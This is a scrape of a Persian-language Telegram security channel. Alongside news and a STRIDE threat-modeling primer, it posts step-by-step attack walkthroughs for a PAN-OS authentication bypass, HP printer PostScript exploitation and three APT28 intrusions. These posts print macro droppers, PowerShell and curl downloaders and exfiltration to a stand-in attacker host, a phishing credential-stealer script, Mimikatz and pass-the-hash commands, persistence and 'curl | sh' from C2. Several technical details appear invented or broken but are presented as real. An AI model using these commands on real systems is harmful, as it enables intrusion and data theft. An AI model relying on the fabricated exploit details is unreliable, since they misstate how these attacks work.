Cyber Warfar – Telegram
Cyber Warfar
2.79K subscribers
92 photos
7 videos
16 files
55 links
Download Telegram
⚠️ رویترز گزارشی داده مبنی بر اینکه یه شرکت اسرائیلی به اسم Paragon Solutions با استفاده از جاسوس‌افزارش، حدود ۹۰ کاربر واتساپ، از جمله روزنامه‌نگارا و فعالای مدنی تو بیشتر از ۲۰ کشور رو هدف قرار داده. که البته گفته شده این حملات تو دسامبر ۲۰۲۴ شناسایی و متوقف شدن.
روش نفوذ به‌صورت "Zero-Click" انجام شده‌؛ به این معنی که تارگت بدون نیاز به کلیک یا تعامل با محتوای مخرب، آلوده شده‌. تو این روش، هکرها فایلای PDF حاوی کدهای مخرب رو برای تارگت ارسال کردن که با باز کردن این فایلا، جاسوس‌افزار به‌صورت خودکار فعال می‌شده.
جاسوس‌افزار Graphite، محصول Paragon، قادره به دیتای شخصی کاربرا دسترسی پیدا کنه، از جمله:
خوندن پیامای رمزنگاری‌شده
دسترسی به مخاطبین
دسترسی به موقعیت جغرافیایی
فعال‌سازی میکروفون و دوربین دستگاه

واتساپ بعد از شناسایی این حمله، با ارسال نامه‌ای به Paragon، خواسته که فعالیتاشون تو این حمله رو متوقف کنن و اعلام کرده که به دفاع از حریم خصوصی کاربران خودش ادامه می‌ده.
شرکت اسرائیلی Paragon Solutions که توسط افسرای سابق واحد ۸۲۰۰ ارتش اسرائیل تأسیس شده، ادعا می‌کنه که ابزارای خودش رو تنها به دولتای دموکراتیک و برای مقاصد قانونی می‌فروشه. از نظر من فعالیتشون خیلی شبیه شرکت NSO و انگاری بعد از افشای فعالیتای اون شرکت، اومدن تو قالب این شرکت دارن فعالیتشون رو ادامه می‌دن. قبلا یه پادکستی در مورد شرکت NSO و پگاسوس تولید کردم که ‌می‌تونین از لینک زیر گوش بدین:

🎹 CastBox

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11❤‍🔥42👌1😍1🌚1
💠 مدل‌سازی تهدید (Threat Modeling) یه فرآیند تحلیلیه که برای شناسایی، ارزیابی و کاهش تهدیدات امنیتی تو سیستم‌های نرم‌افزاری و شبکه‌ها استفاده می‌شه. هدف از مدل‌سازی تهدید شناسایی آسیب‌پذیری‌ها قبل از وقوع حملات سایبری و ارائه راهکارهای مناسب برای کاهش ریسکه.
یکی از متودولوژی‌هایی که تو این حوزه شناخته شده‌اس، فریم‌ورک STRIDE هست که توسط شرکت مایکروسافت توسعه داده شده و برای شناسایی، دسته‌بندی و ارزیابی تهدیدات امنیتی تو سیستم‌های نرم‌افزاری و شبکه‌ها ازش استفاده می‌شه.

⬅️ کلمه STRIDE از حروف اول شش کلمه تشکیل شده:
حرف S: مخفف Spoofing به مفهوم جعل هویت کاربران
حرف T: مخفف Tampering به مفهوم دستکاری دیتاها
حرف R: مخفف Repudiation به مفهوم انکار اقدامات
حرف I: مخفف Information Disclosure به مفهوم افشای اطلاعات
حرف D: مخفف Denial of Service به مفهوم جلوگیری از ارائه سرویس
و حرف E: مخفف Elevation of Privilege به مفهوم ارتقای سطح دسترسی غیرمجاز

جعل هویت (Spoofing):
تو این حمله، مهاجم هویت یه کاربر، فرآیند یا سیستم دیگه رو جعل می‌کنه تا دسترسی غیرمجاز به اطلاعات و منابع داشته باشه.
🔴مثال‌های رایج:
🔘جعل آدرس IP برای ورود غیرمجاز به شبکه
🔘حملات فیشینگ برای سرقت اطلاعات ورود

دستکاری داده‌ها (Tampering):
تو این حمله، مهاجم دیتاهای تو حال ترنسفر یا ذخیره‌شده رو تغییر می‌ده تا اطلاعات مخرب یا نادرست جایگزین بشن.
🔴مثال‌های رایج:
🔘حمله Man-in-the-Middle (MITM) برای تغییر پیام‌های ارسال‌شده
🔘دستکاری دیتابیس‌ها برای تغییر اطلاعات کاربران

انکار عملیات (Repudiation):
این نوع تهدید وقتی رخ می‌ده که کاربر یا مهاجم بعد از انجام یه عملیات، اون رو انکار کنه و سیستم مدرکی برای اثبات اون نداشته باشه.
🔴مثال‌های رایج:
🔘کاربری که تراکنش مالی رو انجام داده اما انکار می‌کنه.
🔘ارسال ایمیل جعلی و ادعای اینکه این ایمیل ارسال نشده.

افشای اطلاعات (Information Disclosure):
این نوع تهدید وقتی رخ می‌دهه که دیتاهای محرمانه در اختیار افراد غیرمجاز قرار بگیرن.
🔴مثال‌های رایج:
🔘نشت اطلاعات شخصی کاربران از دیتابیس‌های عمومی.
🔘عدم استفاده از HTTPS که باعث لو رفتن دیتاها تو حملات شنود می‌شه.

جلوگیری از ارائه سرویس (Denial of Service - DoS):
این نوع حمله باعث می‌شه که یه سیستم یا سرویس، دیگه تو دسترس کاربرای مجاز نباشه.
🔴مثال‌های رایج:
🔘حملات DDoS که باعث مصرف بیش از حد منابع سرور می‌شه.
🔘ارسال حجم زیادی از درخواست‌های جعلی به یه سرور وب.

ارتقای دسترسی غیرمجاز (Elevation of Privilege):
تو این حمله، مهاجم دسترسی‌های خودش رو از سطح عادی به سطح مدیر (Administrator) افزایش می‌ده.
🔴مثال‌های رایج:
🔘حمله Buffer Overflow برای اجرای کدهای مخرب با سطح دسترسی بالا.
🔘دور زدن مکانیزم‌های احراز هویت و اجرای دستورات سیستمی.

⬅️ نحوه پیاده‌سازی STRIDE تو امنیت سیستم‌ها:

مدل‌سازی تهدیدات (Threat Modeling)
🔴شناسایی تمام اجزای سیستم (مثل سرورها، دیتابیس‌ها، APIها و کاربران)
🔴تحلیل و بررسی مسیرهای دیتا و نقاط حساس تو سیستم
🔴استفاده از ابزارهایی مثل Microsoft Threat Modeling Tool

دسته‌بندی تهدیدات بر اساس STRIDE
🔴بررسی اینکه هر جز سیستم، در برابر کدوم نوع از تهدیدات STRIDE آسیب‌پذیره

پیاده‌سازی راه‌کارهای امنیتی
🔴رمزگذاری دیتاها، احراز هویت قوی، بررسی لاگ‌ها و استفاده از فایروال‌ها

نظارت و تست امنیتی
🔴اجرای تست نفوذ (Penetration Testing) و ارزیابی امنیتی به‌صورت دوره‌ای

پ.ن: این محتوا برگرفته از کتاب "راهنمای معماری امنیت سایبری" هست. برای تهیه این کتاب می‌تونین به آی‌دی @liantrain پیام بدین.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
👍83👌3👏1🎉1🕊1🌚1💯1🏆1
⚠️ یه آسیب‌پذیری با شناسه CVE-2025-24200 منتشر شده که یه نقص امنیتی تو دستگاه‌های iPhone و iPadه که به مهاجمای فیزیکی امکان می‌ده حالت محدودیت USB رو تو دستگاه‌های قفل‌شده غیرفعال کنن. این آسیب‌پذیری به دلیل یه مشکل تو مدیریت وضعیت مجوزها به وجود اومده. حالت محدودیت USB قابلیتیه که ارتباط دستگاه با لوازم جانبی USB رو بعد از یه ساعت عدم استفاده، محدود می‌کنه تا از دسترسی غیرمجاز به دیتاها جلوگیری بشه. این آسیب‌پذیری به مهاجم فیزیکی اجازه می‌ده تا با غیرفعال کردن حالت محدودیت USB، به دیتاهای حساس دستگاه دسترسی پیدا کنه یا بدافزار رو نصب کنه.

جزئیات فنی:
نوع آسیب‌پذیری: مشکل در مدیریت مجوزها (Authorization Issue)
شناسه: CVE-2025-24200
امتیاز CVSS: 6.1 (متوسط)
بردار حمله: دسترسی فیزیکی (AV:P)
پیچیدگی حمله: پایین (AC:L)
سطح دسترسی مورد نیاز: بدون نیاز به دسترسی (PR:N)
تأثیر بر محرمانگی: بالا (C:H)
تأثیر بر یکپارچگی: بالا (I:H)
تأثیر بر دسترس‌پذیری: ندارد (A:N)

⬅️ برای محافظت از دستگاه‌هاتون در برابر این آسیب‌پذیری، توصیه می‌شه سیستم‌عامل دستگاه رو به آخرین نسخه به‌روزرسانی کنین. برای این کار، به مسیر Settings > General > Software Update برید و دستورالعمل‌ها رو دنبال کنین.
⬅️ این آسیب‌پذیری توسط بیل مارزاک از Citizen Lab تو دانشگاه تورنتو کشف شده. اپل اعلام کرده که از گزارش سواستفاده از این نقص تو یه حمله بسیار پیچیده علیه افراد خاص، مطلع شده.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
👍532🔥1🤔1🎉1🤩1🕊1🤡1💯1🏆1
⚠️ آسیب‌پذیری CVE-2025-0108 یه نقص امنیتی با شدت بالا تو نرم‌افزار PAN-OS شرکت Palo Alto Networksه که به مهاجم اجازه می‌ده تا بدون نیاز به احراز هویت، به پنل مدیریتی Palo Alto Networks PAN-OS دسترسی پیدا کنه. این کار از طریق بایپس مکانیزم احراز هویت تو صفحات مدیریتی وب انجام می‌شه. به طور خلاصه، این آسیب‌پذیری از یه نقص منطقی (Logic Flaw) تو بررسی اعتبار کاربر ناشی می‌شه که باعث می‌شه بعضی از درخواست‌ها بدون نیاز به توکن ورود (Session Token) پردازش بشن.

دسته‌بندی آسیب‌پذیری:
نوع: دور زدن احراز هویت (Authentication Bypass)
سطح خطر: بالا
هدف: سیستم‌عامل امنیتی PAN-OS که تو فایروال‌های Palo Alto Networks استفاده می‌شه
حملات محتمل: دسترسی غیرمجاز به پنل مدیریت، اجرای کد PHP، تغییر تنظیمات امنیتی

روش‌های سوءاستفاده از آسیب‌پذیری CVE-2025-0108

⬅️ یک: اجرای درخواست بدون احراز هویت
مهاجم می‌تونه با ارسال یک درخواست (HTTP Request) دستکاری‌شده به سرور PAN-OS، احراز هویت رو دور بزنه.
GET /php/system.php HTTP/1.1
Host: target-firewall
User-Agent: Mozilla/5.0

ری‌کوئست بالا بدون نیاز به لاگین، به سرور ارسال میشه و تو بعضی نسخه‌های آسیب‌پذیر، سرور پاسخ معتبر ارسال می‌کنه. اگه این صفحه مدیریتی دسترسی به اسکریپت‌های PHP داشته باشه، مهاجم می‌تونه دستورات مخرب اجرا کنه.

⬅️ دو: اجرای کد مخرب تو محیط PHP
از اونجایی که PAN-OS بعضی اسکریپت‌های PHP اجرایی داره، اگه مهاجم موفق بشه از صفحات بدون احراز هویت ری‌کوئست‌هایی بفرسته که به پارامترهای ورودی PHP دسترسی دارن، می‌تونه کد دلخواه رو اجرا کنه.
GET /php/admin.php?cmd=whoami HTTP/1.1
Host: firewall-target

اگر سرور پاسخ بده:
admin

نشان می‌ده که مهاجم می‌تونه دستورات سیستمی رو روی سرور اجرا کنه.

⬅️ سه: تغییر تنظیمات فایروال و ایجاد کاربر جدید
اگه مهاجم موفق به ارسال ری‌کوئست معتبر بدون احراز هویت بشه، می‌تونه:
یه کاربر جدید تو سیستم ایجاد کنه.
رول‌های فایروال رو تغییر بده و ترافیک رو به نفع خودش route کنه.
تنظیمات لاگ رو غیرفعال کنه تا فعالیت‌های مخرب شناسایی نشه.
مثال درخواست مخرب برای ایجاد یه کاربر جدید:
POST /php/api.php HTTP/1.1
Host: target-firewall
Content-Type: application/json

{
"action": "createUser",
"username": "hacker",
"password": "SuperSecretPass",
"role": "admin"
}

اگه سرور آسیب‌پذیر باشه، ری‌کوئست بالا یه حساب ادمین جدید برای مهاجم ایجاد می‌کنه.

چطور از این حمله جلوگیری کنیم؟
آپدیت فوری PAN-OS به نسخه‌ای که در برابر این آسیب‌پذیری مقاومه.
محدود کردن دسترسی به اینترفیس مدیریتی فقط از طریق VPN یا آی‌پی‌های مجاز.
فعال‌سازی احراز هویت دو مرحله‌ای (2FA) برای دسترسی به پنل.
بررسی لاگ‌ها و تلاش‌های مشکوک برای ورود غیرمجاز.

این آسیب‌پذیری یکی از خطرناک‌ترین نقاط ضعف امنیتی PAN-OS تو سال 2025 محسوب می‌شه و توسط گروه‌های هکری برای دور زدن فایروال سازمان‌ها و کنترل شبکه‌های حساس مورد استفاده قرار گرفته.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
10👌5👍4🔥2👏1
⚠️ آسیب‌پذیری با شناسه CVE-2025-26506 تو پرینترهای HP

آسیب‌پدیری با شناسه CVE-2025-26506 تو پرینترهای HP شناسایی شده. این آسیب‌پذیری از نوع Stack-Based Buffer Overflow - CWE-121ه که موقع پردازش فایل‌های PostScript تو پرینترهای HP رخ می‌ده. تو این نوع حمله، ورودی فراتر از اندازه بافر تعیین‌شده به داخل استک نوشته می‌شه، که در صورت اکسپلویت موفق، می‌تونه منجر به RCE بشه. هکر می‌تونه با ارسال یه فایل PostScript مخرب، کد دلخواهش رو بصورت ریموت اجرا کنه و سطح دسترسیش رو افزایش بده.

⬅️ بردار حمله (Attack Vector)
مهاجم برای اکسپلویت این آسیب‌پذیری، یه فایل PostScript مخرب رو به پرینتر ارسال می‌کنه. این کارو می‌تونه از طریق روش‌های زیر انجام بده:
پورت‌های شبکه‌ای باز پرینتر (مانند 9100/TCP, LPD, IPP)
اتصال مستقیم از طریق USB (در صورتی که فایل تو صف چاپ قرار بگیره)
استفاده از ایمیل یا اشتراک شبکه (ارسال فایل PostScript مخرب به تارگتی که اون رو برای چاپ ارسال کنه)
پس از پردازش فایل، مقدار زیادی دیتا به بافر استک نوشته می‌شه که باعث خرابی حافظه می‌شه و کنترل پردازش رو به هکر منتقل می‌کنه.

⬅️ سناریوی بهره‌برداری (Exploitation)

🔹 گام 1: شناسایی سیستم هدف
هکر ابتدا باید تعیین کنه که آیا پرینتر هدف، جز مدل‌های آسیب‌پذیر هست یا نه. این کار از طریق دو روش زیر می‌تونه انجام بشه:
اسکن شبکه با استفاده از ابزارهایی مثل nmap:
nmap -p 9100,515,631 -A -T4 <target-IP>
or
nmap -p 9100,515,631 --noscript hp-jetdirect-info -O -sV <target-IP>

اگه پورت 9100 (JetDirect), پورت 515 (LPD) یا 631 (IPP) باز باشه، پرینتر مستعد حمله‌اس.
بررسی بنر دستگاه:
nc <target-IP> 9100

بعضی پرینترها تو ریسپانس، اطلاعات مربوط به مدل و فریمور رو ارسال می‌کنن.

🔹 گام 2: ایجاد یه فایل PostScript مخرب
پست‌اسکریپت یه زبان توصیف صفحه‌اس که توسط خیلی از پرینترها پشتیبانی می‌شه. یه نمونه کد مخرب برای سرریز بافر می‌تونه به این شکل باشه:
%!PS
% ایجاد یه حلقه بی‌پایان برای افزایش بار پردازش
userdict begin
100 dict begin
/Buffer 1024 string def
0 1 20000 {
Buffer (AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA) putinterval
} for
end
end

این کد بافر استک رو بیش از حد پر می‌کنه و باعث کرش یا اجرای کد دلخواه می‌شه.

🔹 گام 3: ارسال فایل مخرب به پرینتر
مهاجم می‌تونه فایل رو با یکی از روش‌های زیر به پرینتر ارسال کنه:
از طریق Netcat:
nc <target-IP> 9100 < exploit.ps

از طریق LPD (Line Printer Daemon):
lpr -H <target-IP> -P raw -o raw exploit.ps

یا اگه پرینتر به شبکه‌ای با ایمیل متصل باشه، مهاجم می‌تونه فایل رو تو قالب یه پیوست برای پرینتر ارسال کنه.

🔹 گام 4: اجرای کد بصورت ریموت:
در صورت موفقیت، این حمله می‌تواند:
اجرای دستورات دلخواه تو سطح فریمور پرینتر
دریافت Shell Access برای اجرای دستورات بیشتر
ایجاد یه بکدور تو دستگاه برای حملات آینده

⬅️ پتانسیل استفاده تو حملات پیشرفته (Advanced Exploitation)
اگه مهاجم کنترل یه پرینتر متصل به شبکه داخلی سازمان رو به دست بگیره، می‌تونه:
یک. MITM Attack: ترافیک اسناد چاپی رو رهگیری و تغییر بده.
دو. Pivot Attack: از پرینتر به عنوان نقطه محوری برای نفوذ بیشتر به شبکه استفاده کنه.
سه. Backdoor Installation: از پرینتر برای ایجاد یک نقطه دسترسی دائمی به شبکه سازمان بهره ببره.

⬅️ راه‌کارهای امنیتی (Mitigation)
آپدیت فریمور پرینتر
محدود کردن دسترسی به پورت‌های 9100، 515 و 631 از طریق فایروال
غیرفعال کردن پردازش PostScript تو تنظیمات پرینتر (اگه امکان‌پذیر باشه)
مانیتورینگ لاگ‌های پرینتر برای شناسایی فعالیت‌های غیرعادی
محدود کردن دسترسی پرینتر به کاربرای احراز هویت‌شده

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥9👍6👏2🎉2👌2
می‌خوام سه سناریو واقعی از نفوذهای گروه APT28 رو بزارم. موافقین؟
Anonymous Poll
89%
بله. خیلی می‌تونه مفید باشه.
4%
نه. به درد نمی‌خوره.
7%
نظر خاصی ندارم.
سه سناریو واقعی از نفوذهای گروه APT28

🔹 سناریو یک: نفوذ به شبکه‌ وزارت امور خارجه آلمان با هدف جاسوسی از ارتباطات دولتی با بدافزار Seduploader

🔹 هدف:
نفوذ به سیستم‌های دیپلماتیک برای سرقت اطلاعات حساس
استقرار بدافزار برای مانیتورینگ و جمع‌آوری دیتاها
حرکت جانبی (Lateral Movement) برای گسترش حضور تو شبکه

🔹 گام 1: مهندسی اجتماعی و نفوذ اولیه
گروه APT28 از Spear Phishing برای نفوذ اولیه تو این سناریو استفاده کرده. یه ایمیل رسمی فیک به کارمندا ارسال شده که به نظر می‌رسیده از طرف یه سازمان بین‌المللی معتبر مثل EU External Action Service (EEAS) باشه.

فایل آلوده (Macro-Enabled Document)
ایمیل شامل یه فایل Word آلوده بوده که از ماکرو VBA مخرب استفاده می‌کرده. بعد از باز شدن فایل، ماکرو فعال می‌شده و PowerShell رو برای دانلود بدافزار اجرا می‌کرده:
Sub AutoOpen()
Dim objShell As Object
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -File C:\Users\Public\update.ps1"
End Sub


🔹 گام دو: دانلود و پیاده‌سازی بدافزار Seduploader
فایل update.ps1 که یه اسکریپت پاورشل رمزگذاری‌شده بوده؛ بدافزار اصلی رو دانلود می‌کرده:
$download = New-Object System.Net.WebClient
$url = "https://malicious-server.com/payload.exe"
$path = "$env:APPDATA\Microsoft\Windows\update.exe"
$download.DownloadFile($url, $path)
Start-Process -FilePath $path

ویژگی‌های بدافزار Seduploader
- بررسی سیستم: اطلاعات اولیه (مثل نسخه‌ ویندوز، یوزرنیم، پردازنده) رو جمع‌آوری می‌کنه.
- اجرای دستورات از راه دور (Remote Command Execution)
- ثبت کلیدهای زده‌شده (Keylogging)
- آپلود و دانلود فایل‌های مخرب
- استفاده از DNS Tunneling برای ارسال اطلاعات به سرور C2

ارتباط با سرور C2 با استفاده از DNS Tunneling
بدافزار Seduploader از ری‌کوئست‌های DNS برای ارسال اطلاعات به سرور C2 استفاده می‌کنه:
nslookup -type=TXT x7c9.malicious-domain.com

دیتاها به صورت Base64 یا XOR Encoding انکریپت شده‌ان.

🔹 گام سه: حرکت جانبی (Lateral Movement)
یک. Credential Dumping با استفاده از Mimikatz
بعد از استقرار اولیه، APT28 از ابزار Mimikatz برای سرقت هش‌های رمزعبور استفاده کرده:
privilege::debug
sekurlsa::logonpasswords

دو. Pass-the-Hash (PTH) برای دسترسی به سایر سیستم‌ها
اعضای APT28 با استفاده از هش‌ها به سیستم‌های دیگه متصل می‌شدن:
psexec \\target-system -u administrator -p NTLMHASH cmd.exe

سه. Pivoting با PowerShell Empire
با دسترسی به یه سیستم جدید، برای ایجاد ارتباط مستقیم، از PowerShell Empire استفاده می‌شده:
Invoke-PsExec -ComputerName target-system -Command "net user /add backdoor P@ssw0rd"


🔹 گام چهار: استخراج دیتاها (Exfiltration)
ارسال دیتاهای سرقت‌شده با پاورشل
$bytes = [System.IO.File]::ReadAllBytes("C:\sensitive_data.pdf")
Invoke-WebRequest -Uri "https://malicious-server.com/upload" -Method POST -Body $bytes


🔹 نتیجه:
اعضای گروه APT28 موفق به استخراج اطلاعات حساس دیپلماتیک شدن.

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
👌12👍4🤩4🔥3💯3🍌31❤‍🔥11👏1
سه سناریو واقعی از نفوذهای گروه APT28

🔹سناریو دو: حمله به کمیته ملی دموکرات (DNC) با فیشینگ و بدافزار X-Agent

🔹مقدمه:
گروه APT28 (Fancy Bear) تو سال 2016 حمله‌ای پیشرفته به کمیته ملی دموکرات (DNC) انجام داد که منجر به نشت اطلاعات حساس از ایمیل‌های مقامات عالی‌رتبه حزب دموکرات شد. این حمله یه عملیات پیچیده‌ جاسوسی سایبری بود که شامل مهندسی اجتماعی، اکسپلویت آسیب‌پذیری‌ها، نصب بدافزار، حرکت جانبی (lateral movement) و استخراج دیتاها بود. دیتاهای سرقت شده در نهایت توسط WikiLeaks منتشر شد که تأثیر زیادی روی انتخابات آمریکا گذاشت.

🔹مرحله 1: نفوذ اولیه از طریق فیشینگ هدفمند
گروه APT28 از حملات Spear Phishing برای Credential Harvesting کارمندای DNC استفاده کرده. ایمیل‌های فیکی که شبیه هشدارهای امنیتی گوگل بودن، برای مقامات ارسال شدن. هدف این بوده که اونا رو وادار به وارد کردن یوزرنیم و پسوردشون تو یه صفحه لاگین فیک کنن.
Subject: Unauthorized Access Detected – Change Your Password Immediately
From: Google Security Team <no-reply@security-google.com>

👈 ساخت صفحه لاگین جعلی
گروه APT28 صفحه‌ای که مشابه صفحه لاگین گوگل بوده رو طراحی کرده. این صفحه از طریق HTML و JavaScript اطلاعات لاگین تارگت رو سرقت می‌کرده. یه نمونه‌ از کد JavaScript تو صفحه لاگین فیک:
document.getElementById("login").onsubmit = function() {
fetch("https://malicious-site.com/steal", {
method: "POST",
body: JSON.stringify({
email: document.getElementById("email").value,
password: document.getElementById("password").value
})
});
};

👈 استفاده از URL‌های کوتاه‌شده برای پنهان‌سازی لینک جعلی
گروه APT28 از سرویس‌های کوتاه‌کننده URL (مثل Bit.ly) برای مخفی کردن آدرس واقعی صفحه فیک استفاده کرده. مثال لینک مخرب:
https://bit.ly/secure-google-login


🔹مرحله 2: دسترسی به ایمیل‌ها و نصب بدافزار X-Agent
پس از دستیابی به پسوردها چه اتفاقی می‌افته؟
بعد از سرقت اعتبارنامه‌ها، اعضای گروه تونستن به حساب‌های ایمیل کارمندای DNC دسترسی پیدا کنن. اما این آخر کار نبود؛ برای کنترل گسترده‌تر، APT28 نیاز داشته که کنترل سیستم‌های داخلی DNC رو هم در اختیار بگیره. به همین خاطر اونا بدافزار X-Agent رو مستقر می‌کردن.
استقرار X-Agent
👈 مراحل حمله پس از ورود به سیستم‌ها:
⬅️ 1- اعضای گروه از طریق VPN داخلی DNC یا پروتکل IMAP به ایمیل‌ها متصل می‌شدن.
⬅️ 2- بدافزار X-Agent رو روی سیستم‌های آلوده نصب می‌کردن.
👈 استقرار بدافزار از طریق PowerShell
بدافزار X-Agent با استفاده از PowerShell و رجیستری ویندوز به صورت مخفی اجرا می‌شده.
⬅️ یک. PowerShell Dropper برای دانلود و اجرای بدافزار:
$wc = New-Object System.Net.WebClient
$url = "https://malicious-server.com/xagent.exe"
$path = "$env:APPDATA\chrome_update.exe"
$wc.DownloadFile($url, $path)
Start-Process -FilePath $path -WindowStyle Hidden

⬅️ دو. Persistency تو ویندوز از طریق رجیستری:
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v chrome_update /t REG_SZ /d C:\Users\Public\chrome_update.exe

👈 ویژگی‌های بدافزار X-Agent
⬅️ یک. Keylogging – ثبت کلیدهای فشرده‌شده توسط کاربر
⬅️ دو. سرقت فایل‌ها – ارسال اسناد حساس به سرور C2
⬅️ سه. گرفتن اسکرین‌شات – تصویربرداری از دسکتاپ قربانی
⬅️ چهار. اجرای دستورات از راه دور (Remote Command Execution)
👈 مثال ارتباط X-Agent با سرور C2:
POST /command.php HTTP/1.1
Host: malicious-server.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 50

cmd=upload&file=/Users/Admin/Documents/confidential.pdf


🔹مرحله 3: حرکت جانبی (Lateral Movement) تو شبکه
چطور اعضای گروه تونستن کل شبکه DNC رو آلوده کنن؟
👈بعد از دسترسی به اولین سیستم، APT28 نیاز داشته به سیستم‌های دیگه هم نفوذ کنه. اونا این کار رو با استفاده از:
⬅️ یک. Credential Dumping با Mimikatz
⬅️ دو. Pass-the-Hash (PTH) برای ورود به سیستم‌های دیگه
⬅️سه. Pivoting برای دسترسی به منابع مهم
👈حرکت جانبی تو شبکه
⬅️ اجرای Mimikatz برای استخراج پسورد کارمندای DNC
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords"

⬅️ اجرای Pass-the-Hash برای ورود به سایر سیستم‌ها
psexec \\target-system -u administrator -p NTLMHASH cmd.exe

اجرای Pivoting با PowerShell Empire
Invoke-PsExec -ComputerName target-system -Command "net user /add hacker P@ssw0rd"
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13👏43💯3🔥1
🔹مرحله 4: استخراج دیتاها و انتقال به سرور گروه APT28
چطور اطلاعات سرقت‌شده رو به بیرون ارسال کردن؟
گروه APT28 اطلاعات سرقت‌شده رو از طریق پروتکل HTTPS رمزگذاری‌شده و DNS Tunneling به سرورهای خودش ارسال می‌کرده.
👈روش‌های استخراج دیتاها
⬅️ ارسال اطلاعات با استفاده از PowerShell و HTTPS
$bytes = [System.IO.File]::ReadAllBytes("C:\sensitive_data.pdf")
Invoke-WebRequest -Uri "https://malicious-server.com/upload" -Method POST -Body $bytes

⬅️ اجرای DNS Tunneling برای ارسال دیتا بدون شناسایی
nslookup -type=TXT a1b2c3d4.example.com

⬅️ استفاده از Zip + XOR Encoding برای مخفی‌سازی دیتاها
zip -e stolen_data.zip confidential.pdf
cat stolen_data.zip | xor 0x55 > encoded_data.dat
curl -X POST --data-binary @encoded_data.dat https://malicious-server.com/upload


🔹نتیجه نهایی: تأثیر و پیامدهای این حمله
اعضای گروه موفق به سرقت و افشای هزاران ایمیل محرمانه از مقامات DNC شدن.
اطلاعات منتشرشده توسط WikiLeaks باعث جنجال سیاسی تو آمریکا شد.
این حمله تأثیر قابل توجهی روی انتخابات 2016 آمریکا گذاشت.

🔹جمع‌بندی تاکتیک‌های APT28
فیشینگ هدفمند با صفحات لاگین جعلی
نصب بدافزار X-Agent برای کنترل کامل سیستم‌ها
حرکت جانبی با استفاده از Mimikatz و Pass-the-Hash
استخراج اطلاعات از طریق HTTPS و DNS Tunneling

🔫🔫🔫🔫🔫 🔫🔫🔫🫡🔫🔫
@CyberWarfar
Please open Telegram to view this post
VIEW IN TELEGRAM
👍133🔥3👏21🎉1💯1
سه سناریو واقعی از نفوذهای گروه APT28

🔹 سناریو سه: حمله به ناتو با بدافزار Komplex (macOS Exploit)
👈 مقدمه: چرا این حمله مهم بود؟
گروه APT28 یکی از معدود گروه‌هاییه که به‌طور خاص سیستم‌عامل macOS رو هدف قرار داده. تو حمله‌ای که علیه ناتو و سازمان‌های مرتبط با اون انجام شد، اونا از بدافزار Komplex برای نفوذ و سرقت اطلاعات استفاده کردن.

🔹 مرحله 1: نفوذ اولیه با استفاده از PDF آلوده
👈 نحوه ساخت فایل PDF آلوده
این گروه یه PDF آلوده رو طراحی کرد که از یک حمله‌ی Exploit-Based بهره‌ ببره.
⬅️ساختار حمله تو فایل PDF:
فایل شامل یه اسکریپت JS مخربه که از یه آسیب‌پذیری تو Adobe Reader استفاده می‌کرده. این اسکریپت باعث اجرای کد مخرب تو سطح سیستم‌عامل macOS شده.
⬅️ نمونه‌کد جاوا اسکریپت مخرب داخل PDF
this.submitForm("file:///System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Support/lsregister");

⬅️ اجرای دستور تو macOS برای دانلود بدافزار
system("/usr/bin/curl -o /tmp/update http://malicious-server.com/malware");
system("chmod +x /tmp/update; /tmp/update");

این کد از curl برای دانلود بدافزار و از chmod برای اجرای اون استفاده می‌کنه.

🔹 مرحله 2: نصب و اجرای بدافزار Komplex
👈 روش‌های استقرار بدافزار
⬅️ ایجاد Persistency تو macOS
mkdir -p ~/Library/LaunchAgents
echo '
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.Komplex</string>
<key>ProgramArguments</key>
<array>
<string>/Users/victim/.Komplex/Komplex</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>' > ~/Library/LaunchAgents/com.apple.Komplex.plist

این فایل Launch Agent تو macOS باعث می‌شه که بدافزار به‌طور خودکار تو هر بار بوت اجرا بشه.
⬅️ روش دیگه: تغییر تو ~/.bash_profile برای اجرای مخفیانه
echo "/Users/victim/.Komplex/Komplex &" >> ~/.bash_profile


🔹 مرحله 3: ارتباط با سرور C2 و اجرای دستورات از راه دور
👈 نحوه ارتباط با سرور C2
⬅️ ارتباط رمزگذاری‌شده با C2
POST /connect HTTP/1.1
Host: malicious-server.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 50

cmd=upload&file=/Users/Admin/Documents/confidential.pdf

⬅️ دریافت دستورات از C2
curl -s https://malicious-server.com/command | sh

این دستور هر بار از سرور یه اسکریپت جدید دریافت و اجرا می‌کنه.
⬅️ دریافت لیست فایل‌ها و ارسال اون به سرور
ls -la ~/Documents/ > /tmp/list.txt
curl -X POST --data-binary @/tmp/list.txt https://malicious-server.com/upload


🔹 مرحله 4: حرکت جانبی در شبکه و استخراج اطلاعات
👈 حرکت جانبی (Lateral Movement)
⬅️ سرقت پسوردهای ذخیره‌شده تو Keychain macOS
security find-generic-password -ga "WiFi" | grep "password"

⬅️ استفاده از SSH برای گسترش حمله
ssh user@target-system "curl -s https://malicious-server.com/komplex | bash"


